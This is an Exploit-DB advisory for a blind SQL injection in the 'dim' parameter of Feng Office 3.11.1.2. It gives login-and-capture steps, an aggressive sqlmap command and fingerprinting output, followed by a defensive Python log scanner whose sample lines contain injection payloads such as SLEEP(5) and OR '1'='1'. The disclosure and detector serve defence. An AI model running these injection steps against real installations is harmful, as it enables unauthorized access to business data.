[webapps] Feng Office 3.11.1.2 - SQL Injection
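This article describes a blind SQL injection vulnerability in Feng Office 3.11.1.2: an attacker can log in to the application and inject through the "dim" parameter. The sqlmap tool can automate the exploitation process, and it identified the back-end database as MySQL 5.7.37. 2025-4-10 00:0:0 Author: www.exploit-db.com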

# Exploit Title: Blind SQL Injection - FengOffice
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com


SQL Injection:

1. Log in to the application
2. Click on "Workspaces"
3. Copy the full URL
4. Paste the HTTP GET request into a text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process

sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint

[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.37
[...]
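
A defender-side check for the activity described above, as an added example that is not part of the original advisory: it scans web access logs for SQL syntax in the "dim" parameter and for a sqlmap User-Agent. The log lines, request path and other parameters are constructed, and treating "dim" as an identifier-like value is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format). The path, the "c"
# and "q" parameters, users and addresses are placeholders, not Feng Office URLs.
SAMPLE_LOG = """\
198.51.100.7 - alice [10/Jul/2024:12:10:01 +0000] "GET /index.php?c=example&dim=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - bob [10/Jul/2024:12:13:03 +0000] "GET /index.php?c=example&dim=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/1.x (https://sqlmap.org)"
203.0.113.9 - bob [10/Jul/2024:12:13:04 +0000] "GET /index.php?c=example&dim=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
198.51.100.7 - alice [10/Jul/2024:12:14:00 +0000] "GET /index.php?c=example&q=select%20all HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Assumption: a legitimate "dim" value is identifier-like, so quotes, comment
# markers and SQL keywords in it are treated as injection indicators.
SQLI_TOKENS = re.compile(
    r"['\"`;#]|--|/\*|\b(?:union|select|sleep|benchmark|and|or)\b", re.IGNORECASE)


def scan(log_text, param="dim"):
    """Return (client_ip, reasons, decoded_value) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes the value, so encoded payloads are inspected
        # in the form the application would receive them.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != param:
                continue
            reasons = []
            if SQLI_TOKENS.search(value):
                reasons.append("sql-syntax")
            # The User-Agent is trivially changed, so it only adds confidence.
            if "sqlmap" in m["ua"].lower():
                reasons.append("sqlmap-ua")
            if reasons:
                findings.append((m["ip"], "+".join(reasons), value))
    return findings


if __name__ == "__main__":
    for ip, reasons, value in scan(SAMPLE_LOG):
        print(f"{ip}  {reasons:22}  dim={value!r}")
```

Both flagged requests come from an authenticated session, which matches the advisory's first step, so the authenticated user field in the log is worth correlating alongside the client address.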
            

Source: https://www.exploit-db.com/exploits/52154